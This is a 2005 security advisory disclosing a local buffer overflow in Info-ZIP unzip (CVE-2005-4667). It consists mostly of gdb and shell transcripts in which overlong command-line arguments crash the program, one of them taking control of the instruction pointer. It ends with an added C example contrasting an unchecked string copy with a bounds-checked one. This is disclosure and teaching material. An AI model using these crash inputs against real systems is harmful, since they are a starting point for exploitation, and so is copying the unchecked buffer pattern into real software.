
***********************************************************************

$ An open security advisory #14.5 UNZIP Buffer Overflow

***********************************************************************

1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com -+- www.open-security.org

2: Bug Released: December 2005

3: Bug Impact Rate: Undefined

4: Bug Scope Rate: Local

***********************************************************************

$ This advisory and/or proof of concept code must not be used for commercial gain.

***********************************************************************

UNZIP

http://www.info-zip.org/

This bug got a CVE number, which can be found at http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4667
so I thought I might as well add it to the site. It was originally a post to Full-Disclosure as a joke, but I
might as well share it here too :-)

** CAUTION: This is an uber lame, n0n-r00t bug. **

Just to add to the pot, this little bug has been there a long time, mmm, around 2+ yrs. Any apps calling
unzip? Any unzip archives with rather large files?

[c0ntexlinuxbox tmp]$ gdb -q unzip
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) r `perl -e 'print "A" x 5000'`
Starting program: /usr/bin/unzip `perl -e 'print "A" x 5000'`
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0xffffe000
(no debugging symbols found)...(no debugging symbols found)...unzip: cannot find or open AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[snip]
AAAAAAAAAAAAAA.ZIP.
*** glibc detected *** double free or corruption: 0x08075008 ***

Program received signal SIGABRT, Aborted.
0xffffe410 in __kernel_vsyscall ()
(gdb) bt
#0 0xffffe410 in __kernel_vsyscall ()
#1 0x002a2955 in raise () from /lib/tls/libc.so.6
#2 0x002a4319 in abort () from /lib/tls/libc.so.6
#3 0x002dba1b in malloc_printerr () from /lib/tls/libc.so.6
#4 0x002dc4ba in free () from /lib/tls/libc.so.6
#5 0x080543a6 in ?? ()
#6 0x08075008 in ?? ()
#7 0x00000005 in ?? ()
#8 0x00000000 in ?? ()
(gdb) frame 4
#4 0x002dc4ba in free () from /lib/tls/libc.so.6
(gdb) i r
eax            0x0        0
ecx            0x10b7     4279
edx            0x6        6
ebx            0x39dff4   3792884
esp            0xbfdc2194 0xbfdc2194
ebp            0xbfdc21a8 0xbfdc21a8
esi            0x39f800   3799040
edi            0x8075008  134696968
eip            0x2dc4ba   0x2dc4ba
eflags         0x200246   2097734
cs             0x73       115
ss             0x7b       123
ds             0x7b       123
es             0x7b       123
fs             0x0        0
gs             0x33       51
(gdb) x/s $edi
0x8075008: 'A'
(gdb) x/s $esi
0x39f800 : "\001"
(gdb)
0x39f802 : ""
(gdb)

(gdb) r `python -c 'print "\x90" * 50000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": File in wrong format
Starting program: /usr/bin/unzip `python -c 'print "\x90" * 50000'`
Reading symbols from shared object read from target memory...(no debugging symbols found)...done.
Loaded system supplied DSO at 0xffffe000
(no debugging symbols found)...(no debugging symbols found)...

Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb)

[c0ntex ~]$ unzip -v | head -1
UnZip 5.32 of 3 November 1997, by Info-ZIP. Maintained by Greg Roelofs. Send
[c0ntex ~]$
[c0ntex ~]$ uname -a
SunOS 5.8 Generic_117350-24 sun4u sparc SUNW,UltraAX-i2
[c0ntex ~]$ unzip `perl -e 'print "A" x 50000'`
Bus Error (core dumped)
[c0ntex ~]$

c0ntexdebauch:~$ unzip -v | head -1
UnZip 5.52 of 28 February 2005, by Info-ZIP. Maintained by C. Spieler. Send
c0ntexdebauch:~$ uname -a
Linux debauch 2.4.27-2-386 #1 Mon May 16 16:47:51 JST 2005 i686 GNU/Linux
c0ntexdebauch:~$ unzip `perl -e 'print "A" x 32000'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.ZIP.
error: zipfile probably corrupt (segmentation violation)
c0ntexdebauch:~$

[c0ntexlinuxbox tmp]$ unzip -v | head -1
UnZip 5.51 of 22 May 2004, by Info-ZIP. Maintained by C. Spieler. Send
[c0ntexlinuxbox tmp]$ uname -a
Linux linuxbox 2.6.12 #2 Wed Jul 13 10:19:26 BST 2005 i686 i686 i386 GNU/Linux
[c0ntexlinuxbox tmp]$ unzip `perl -e 'print "A" x 50000'`
Segmentation fault
[c0ntexlinuxbox tmp]$
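The transcripts above show unzip appending ".ZIP" to an overlong argument and then corrupting the heap, which is the signature of a suffix appended into a fixed-size buffer with no length check. The following is an added example, not Info-ZIP's code: it places that assumed pattern next to a bounded version that refuses any name which cannot fit; FILNAMSIZ, build_name_unchecked, build_name_checked and make_arg are hypothetical names chosen here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define FILNAMSIZ 1024   /* assumed fixed buffer size, not unzip's real value */
#define ZSUFFIX   ".ZIP"

/* Assumed vulnerable pattern: copy the argument into a fixed buffer and
 * append the suffix with no length check, so a 5000-byte argument runs
 * past the buffer (the heap corruption glibc's free() reports above). */
void build_name_unchecked(char dst[FILNAMSIZ], const char *arg)
{
    strcpy(dst, arg);
    strcat(dst, ZSUFFIX);
}

/* Hardened form: size the result first and fail closed.
 * Returns 0 on success, -1 if arg + ".ZIP" + NUL would not fit in dst. */
int build_name_checked(char *dst, size_t dstlen, const char *arg)
{
    size_t arglen = strlen(arg), suflen = strlen(ZSUFFIX);
    if (dstlen == 0 || arglen > dstlen - 1 || suflen > dstlen - 1 - arglen)
        return -1;                        /* no size_t wrap-around */
    memcpy(dst, arg, arglen);
    memcpy(dst + arglen, ZSUFFIX, suflen + 1);   /* includes the NUL */
    return 0;
}

/* Builds a constructed argument of n 'A's, like perl -e 'print "A" x n'
 * in the advisory. Caller frees the result. */
char *make_arg(size_t n)
{
    char *s = malloc(n + 1);
    if (s != NULL) {
        memset(s, 'A', n);
        s[n] = '\0';
    }
    return s;
}

int main(void)
{
    char buf[FILNAMSIZ];
    char *arg = make_arg(5000);
    if (arg && build_name_checked(buf, sizeof buf, arg) != 0)
        printf("rejected %zu-byte name: exceeds %d-byte buffer\n",
               strlen(arg), FILNAMSIZ);
    free(arg);
    return 0;
}
```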
